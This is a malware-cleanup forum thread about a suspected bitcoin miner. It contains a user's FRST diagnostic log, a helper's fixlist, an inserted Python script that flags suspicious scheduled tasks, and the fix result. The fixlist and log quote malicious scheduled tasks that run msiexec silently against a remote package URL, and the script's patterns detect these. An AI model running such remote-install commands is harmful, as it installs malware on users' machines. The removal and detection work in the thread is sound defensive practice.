FirewallRules: [{E2EDB791-F173-4372-AC7B-034B9710C230}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{BC9DADB6-8473-43D2-96FD-FD726E9BB013}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{193F2B1F-0DA9-4711-887F-3ED626016202}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{9D2B0873-BC44-4EDC-95A6-643FB1055664}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{CF7AEC5F-4D63-4972-AC11-1DCE22095F46}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{823D3430-D5F0-4AD2-BCF8-BB4839A12AB9}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{376867FA-3140-4A61-9CBA-168DCE9B8216}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{B6D40083-1F4E-477A-9015-8DC7E9A6A3C1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{7E62B397-4825-42F8-9A15-E6ED471E0842}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{17289A97-0812-45DA-B9F8-824BEEE7D45C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{BC971134-8067-4B9F-9EB2-3A04D2DD62F1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{CE24B0E2-FC9C-4416-BF6D-2E4943991655}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{C521D663-E846-45B1-B592-DEB0438CD546}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{4D14BB88-E721-4A09-9B0C-45C52C06B6A0}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{98AE550D-AE3C-4286-907C-A78F1169EAD6}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{D55FDDCB-BD31-40A3-9B65-005FC38D9A7B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{DF498C8A-17E0-4FE0-8B77-16FDB398E8E6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{987D7429-B9D0-4E08-A619-DA0B50A3E051}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{05AFB857-23D0-40D7-9E9E-EBD50D6AF0BC}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{7E6397DA-11FF-495D-BBDA-EDB0E1F8C2B7}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{70248E8A-4E3E-49D2-8A4B-184E4DC26B78}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{7D8251D0-28ED-4EDE-9545-D62A8457EEBF}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{D8165305-DF6F-458E-B77A-D66DD8119582}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{F49A626E-6773-48DD-B529-1D2CABA6DB40}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{2BB23635-3555-4760-8329-9C3E6BEC50D9}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{5EF6B97B-6CC2-4D6D-A2FD-2170143E542C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{CC44B33F-2809-487C-8B49-0064BD70855A}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{73400E7A-F989-43CB-84D0-D1EA511B25F9}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{380E9148-9BA9-482E-A41C-82E22059545A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{1A893123-B4BA-456F-A0C7-41F838DC949F}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{8DB1E1F0-16A6-4606-9005-2050E5C78DE7}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{94EB72EF-A6B6-40A4-B5C2-6012F19A2856}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{C58183BB-F885-413A-8CCD-F9C3CCA34618}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{4D6DA014-7F0C-4B62-961A-70A13657F889}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{04F8F7EA-9E8D-4B8A-AA7C-E1546EBC72BE}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{D2FA1B8F-C328-4C2E-AA5B-FB60C501ECC0}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{10D54F44-89D5-4BBE-9707-0159D50EF144}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{8B080234-427A-4E7E-BDED-E4853E19C777}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{C6A43CF8-A945-4350-ADBF-68B3F3A1E9D5}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{D96CE39B-1EC5-47C4-B76F-591963112C3F}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{2559EE57-6464-4F43-9CA4-3245EA7A496F}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{1B2A11D6-89E4-4D54-8C29-31E8F4DA6D77}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{674586D3-506E-4FDD-A8AE-D3FAF3B0DA7A}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{CD11B4D0-772F-453F-A1F0-BC0E1CF510E6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{13D2236C-FE05-4D62-9CFA-6200735089C2}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{FD2FA0E1-2074-415C-9F02-10C196F2C6A2}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{8847043E-064A-490F-804D-68759745A67C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{8061FEA0-EF8E-4BF6-B1BB-808DED40D163}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{93678E0E-C66D-43DA-868A-F9E2058773BD}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{59C93D05-4690-44B4-9389-0F118AD02F38}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe

==================== Restore Points =========================

07-01-2019 21:54:57 Naplánovaný kontrolní bod
11-01-2019 13:06:14 Operace obnovení

==================== Faulty Device Manager Devices =============

Name: Realtek High Definition Audio
Description: Realtek High Definition Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Realtek
Service: IntcAzAudAddService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Intel(R) Display Audio
Description: Intel(R) Display Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Intel(R) Corporation
Service: IntcDAud
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver


==================== Event log errors: =========================

Application errors:
==================
Error: (01/11/2019 08:07:55 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:09:03 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:09:02 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:09:01 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:09:00 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:08:59 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:08:58 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:08:57 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.


System errors:
=============
Error: (01/12/2019 12:05:07 AM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby EventSystem s argumenty Není k dispozici za účelem spuštění serveru:
{1BE1F766-5536-11D1-B726-00C04FB926AF}

Error: (01/12/2019 12:04:21 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/12/2019 12:03:24 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/12/2019 12:03:09 AM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{9E175B68-F52A-11D8-B9A5-505054503030}

Error: (01/12/2019 12:02:11 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/12/2019 12:01:05 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/12/2019 12:00:59 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby TokenBroker s argumenty Není k dispozici za účelem spuštění serveru:
Windows.Internal.Security.Authentication.Web.TokenBrokerInternal

Error: (01/12/2019 12:00:59 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby netprofm s argumenty Není k dispozici za účelem spuštění serveru:
{A47979D2-C419-11D9-A5B4-001185AD2B89}


Windows Defender:
===================================
Date: 2019-01-11 13:05:02.337
Description:
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {C7624ED8-55B8-4C11-A697-F488F786E077}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Úplné prohledávání
Uživatel: DESKTOP-VBSMI5O\Martin

Date: 2019-01-10 19:36:54.115
Description:
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {3AEA90E1-AC2C-415F-92A2-FF1B00481283}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2019-01-10 19:23:18.123
Description:
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {B5282268-AE53-47D3-948C-ECE9541D4170}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2019-01-10 19:01:02.490
Description:
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {B8CB204C-EF17-40F0-8A73-72ED9379FE3F}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2019-01-10 17:30:21.507
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:JS/Redirector!rfn
ID: 2147692383
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\ulol\AppData\Roaming\product.dll
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: DESKTOP-VBSMI5O\Martin
Název procesu: C:\Users\ulol\AppData\Local\Temp\is-7QKIU.tmp\installer.tmp
Verze podpisu: AV: 1.283.2606.0, AS: 1.283.2606.0, NIS: 1.283.2606.0
Verze modulu: AM: 1.1.15500.2, NIS: 1.1.15500.2

Date: 2019-01-11 23:59:21.017
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.

Date: 2019-01-11 20:05:50.438
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.

Date: 2019-01-11 13:46:01.063
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.

CodeIntegrity:
===================================

Date: 2019-01-11 19:33:13.957
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 19:23:44.957
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 19:02:52.546
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 18:50:49.237
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 18:35:34.802
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 18:28:40.259
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 17:56:09.418
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 15:33:10.017
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-3630QM CPU @ 2.40GHz
Percentage of memory in use: 16%
Total physical RAM: 6035.48 MB
Available physical RAM: 5059.46 MB
Total Virtual: 6995.48 MB
Available Virtual: 6223.95 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:902.98 GB) (Free:593.08 GB) NTFS

\\?\Volume{7531e688-2fc9-4f9c-adf4-293c168a2c7e}\ (Windows RE tools) (Fixed) (Total:0.49 GB) (Free:0.17 GB) NTFS
\\?\Volume{ab46e8c9-01c0-4456-83ee-e16ccf8e90a8}\ () (Fixed) (Total:0.84 GB) (Free:0.33 GB) NTFS
\\?\Volume{d5549186-e4a3-4c4f-91cf-dc8b1b6f6540}\ () (Fixed) (Total:0.44 GB) (Free:0.42 GB) NTFS
\\?\Volume{2b981f92-3351-4f9f-b83d-9d44c784b14a}\ () (Fixed) (Total:0.34 GB) (Free:0.31 GB) NTFS
\\?\Volume{44e90043-829f-4bc5-b6bf-38a1d1519b56}\ (SAMSUNG_REC2) (Fixed) (Total:25 GB) (Free:0.91 GB) NTFS
\\?\Volume{318b7a2b-74b1-41bd-4173-636c65706975}\ (SAMSUNG_REC) (Fixed) (Total:1 GB) (Free:0.28 GB) FAT32
\\?\Volume{fe517963-fc07-4878-9792-efa4b3e98e24}\ (SYSTEM) (Fixed) (Total:0.29 GB) (Free:0.24 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 4EC8E0BC)

Partition: GPT.

==================== End of Addition.txt ============================

Re: bitcoin miner

Posted: 12 Jan 2019 11:26
by Rudy
Open Notepad and copy the following into it:
Start

CloseProcesses:
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {4fc3e674-a3f9-11e8-b924-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec38e4-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec39f6-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {df1b3e25-3b2c-11e8-b912-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f6086f2d-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f608762c-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
SearchScopes: HKU\S-1-5-21-195099987-321758953-278711717-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
U2 bddci; no ImagePath
C:\WINDOWS\System32\Tasks\kuaejfar
C:\WINDOWS\System32\Tasks\gcknyzn
C:\Users\ulol\rstr2.ini
C:\ProgramData\ts.dat
C:\ProgramData\lock.dat
C:\ProgramData\irw.atsd
C:\WINDOWS\System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A}
C:\ProgramData\ext.dat
C:\ProgramData\ext.dat
C:\ProgramData\lock.dat
C:\ProgramData\ts.dat
C:\Users\ulol\AppData\Local\UeaYTEArbi.exe
C:\Users\ulol\AppData\Local\Temp
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
Task: {B0400B46-4EE3-44BE-9C04-F436BEF5665F} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {31EC4593-383C-4B64-9941-178C628FAEAF} - System32\Tasks\kuaejfar => "msiexec" /q -package hxxps://superdomain1709.info/qjilljpzujimar.eau
Task: {7D591FD9-73EA-4790-8E68-404BAF098DDE} - System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A} => C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe [1601-01-03] (Microsoft Corporation) <==== ATTENTION
Task: {0273991C-90F1-49BB-A997-73BF1C769F3D} - System32\Tasks\gcknyzn => "msiexec" -package hxxps://superdomain1709.info/ipuaop.nqm /q
C:\Users\ulol\AppData\Roaming\product.dll
C:\Users\ulol\AppData\Local\Temp\is-7QKIU.tmp\installer.tmp

EmptyTemp:
Hosts:
End
Save it to the desktop as fixlist.txt. Run FRST again and click >Fix<. When the action finishes, a log will appear; copy it here.
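The fixlist above removes two scheduled tasks that run `msiexec` against a remote package URL, a task whose binary carries a 1601 file date, and a service with no ImagePath. The following triage script, an added example and not part of the thread or of FRST, applies those three indicators to FRST "Task:" and service lines; the sample lines are modelled on the log above, and the defrag task with the all-zero GUID is a constructed benign control.

```python
import re

# Constructed sample modelled on the FRST output in this thread (URLs stay defanged
# as FRST prints them). The ScheduledDefrag line is a made-up benign control.
SAMPLE_LINES = [
    r'Task: {31EC4593-383C-4B64-9941-178C628FAEAF} - System32\Tasks\kuaejfar => "msiexec" /q -package hxxps://superdomain1709.info/qjilljpzujimar.eau',
    r'Task: {7D591FD9-73EA-4790-8E68-404BAF098DDE} - System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A} => C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe [1601-01-03] (Microsoft Corporation) <==== ATTENTION',
    r'Task: {00000000-0000-0000-0000-000000000000} - \Microsoft\Windows\Defrag\ScheduledDefrag => C:\WINDOWS\system32\defrag.exe [2018-04-11] (Microsoft Corporation)',
    r'U2 bddci; no ImagePath',
]

TASK_RE = re.compile(r'^Task: \{[0-9A-Fa-f-]+\} - (?P<name>.+?) => (?P<action>.*)$')
# FRST service lines look like "S3 name; path [...]"; the malicious one has no path.
SERVICE_RE = re.compile(r'^[SUR]\d+ (?P<name>[^;]+); no ImagePath$')
DATE_RE = re.compile(r'\[(\d{4})-\d{2}-\d{2}\]')
URL_RE = re.compile(r'\bh(?:xx|tt)ps?://', re.IGNORECASE)
PROFILE_RE = re.compile(r'\\AppData\\(?:Roaming|Local)\\', re.IGNORECASE)


def suspicious_reasons(action):
    """Return the indicators that make a task action worth a closer look."""
    reasons = []
    if 'msiexec' in action.lower() and URL_RE.search(action):
        reasons.append('msiexec installs a package fetched from a remote URL')
    m = DATE_RE.search(action)
    if m and int(m.group(1)) < 1980:
        # Windows FILETIME starts at 1601-01-01; a date this early means the
        # timestamp was zeroed or tampered with, not a genuinely old file.
        reasons.append(f'implausible file timestamp {m.group(0)}')
    if PROFILE_RE.search(action):
        reasons.append('task target lives in a user profile directory')
    return reasons


def triage(lines):
    """Map each suspicious task or service name to its list of reasons."""
    findings = {}
    for line in lines:
        t = TASK_RE.match(line)
        if t:
            reasons = suspicious_reasons(t.group('action'))
            if reasons:
                findings[t.group('name')] = reasons
            continue
        s = SERVICE_RE.match(line)
        if s:
            findings[s.group('name')] = ['service registered without an ImagePath']
    return findings


if __name__ == '__main__':
    for name, reasons in triage(SAMPLE_LINES).items():
        print(name, '->', '; '.join(reasons))
```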

Re: bitcoin miner

Posted: 12 Jan 2019 11:43
by ulol
Fix result of Farbar Recovery Scan Tool (x64) Version: 28.09.2018
Ran by Martin (12-01-2019 11:27:39) Run:1
Running from C:\Users\ulol\Desktop
Loaded Profiles: Martin (Available Profiles: defaultuser0 & Martin)
Boot Mode: Safe Mode (minimal)
==============================================

fixlist content:
*****************
Start

CloseProcesses:
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {4fc3e674-a3f9-11e8-b924-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec38e4-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec39f6-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {df1b3e25-3b2c-11e8-b912-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f6086f2d-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f608762c-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
SearchScopes: HKU\S-1-5-21-195099987-321758953-278711717-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
U2 bddci; no ImagePath
C:\WINDOWS\System32\Tasks\kuaejfar
C:\WINDOWS\System32\Tasks\gcknyzn
C:\Users\ulol\rstr2.ini
C:\ProgramData\ts.dat
C:\ProgramData\lock.dat
C:\ProgramData\irw.atsd
C:\WINDOWS\System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A}
C:\ProgramData\ext.dat
C:\ProgramData\ext.dat
C:\ProgramData\lock.dat
C:\ProgramData\ts.dat
C:\Users\ulol\AppData\Local\UeaYTEArbi.exe
C:\Users\ulol\AppData\Local\Temp
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
Task: {B0400B46-4EE3-44BE-9C04-F436BEF5665F} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {31EC4593-383C-4B64-9941-178C628FAEAF} - System32\Tasks\kuaejfar => "msiexec" /q -package hxxps://superdomain1709.info/qjilljpzujimar.eau
Task: {7D591FD9-73EA-4790-8E68-404BAF098DDE} - System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A} => C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe [1601-01-03] (Microsoft Corporation) <==== ATTENTION
Task: {0273991C-90F1-49BB-A997-73BF1C769F3D} - System32\Tasks\gcknyzn => "msiexec" -package hxxps://superdomain1709.info/ipuaop.nqm /q
C:\Users\ulol\AppData\Roaming\product.dll
C:\Users\ulol\AppData\Local\Temp\is-7QKIU.tmp\installer.tmp

EmptyTemp:
Hosts:
End
*****************

Processes closed successfully.
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4fc3e674-a3f9-11e8-b924-50b7c3b63006}" => removed successfully
HKLM\Software\Classes\CLSID\{4fc3e674-a3f9-11e8-b924-50b7c3b63006} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{84ec38e4-b5a9-11e8-b92a-20898411baf6}" => removed successfully
HKLM\Software\Classes\CLSID\{84ec38e4-b5a9-11e8-b92a-20898411baf6} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{84ec39f6-b5a9-11e8-b92a-20898411baf6}" => removed successfully
HKLM\Software\Classes\CLSID\{84ec39f6-b5a9-11e8-b92a-20898411baf6} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{df1b3e25-3b2c-11e8-b912-50b7c3b63006}" => removed successfully
HKLM\Software\Classes\CLSID\{df1b3e25-3b2c-11e8-b912-50b7c3b63006} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f6086f2d-f889-11e8-b934-50b7c3b63006}" => removed successfully
HKLM\Software\Classes\CLSID\{f6086f2d-f889-11e8-b934-50b7c3b63006} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f608762c-f889-11e8-b934-50b7c3b63006}" => removed successfully
HKLM\Software\Classes\CLSID\{f608762c-f889-11e8-b934-50b7c3b63006} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
"HKLM\System\CurrentControlSet\Services\bddci" => removed successfully
bddci => service removed successfully
C:\WINDOWS\System32\Tasks\kuaejfar => moved successfully
C:\WINDOWS\System32\Tasks\gcknyzn => moved successfully
C:\Users\ulol\rstr2.ini => moved successfully
C:\ProgramData\ts.dat => moved successfully
C:\ProgramData\lock.dat => moved successfully
C:\ProgramData\irw.atsd => moved successfully
C:\WINDOWS\System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A} => moved successfully
C:\ProgramData\ext.dat => moved successfully
"C:\ProgramData\ext.dat" => not found
"C:\ProgramData\lock.dat" => not found
"C:\ProgramData\ts.dat" => not found
C:\Users\ulol\AppData\Local\UeaYTEArbi.exe => moved successfully
C:\Users\ulol\AppData\Local\Temp => moved successfully
"HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui" => removed successfully
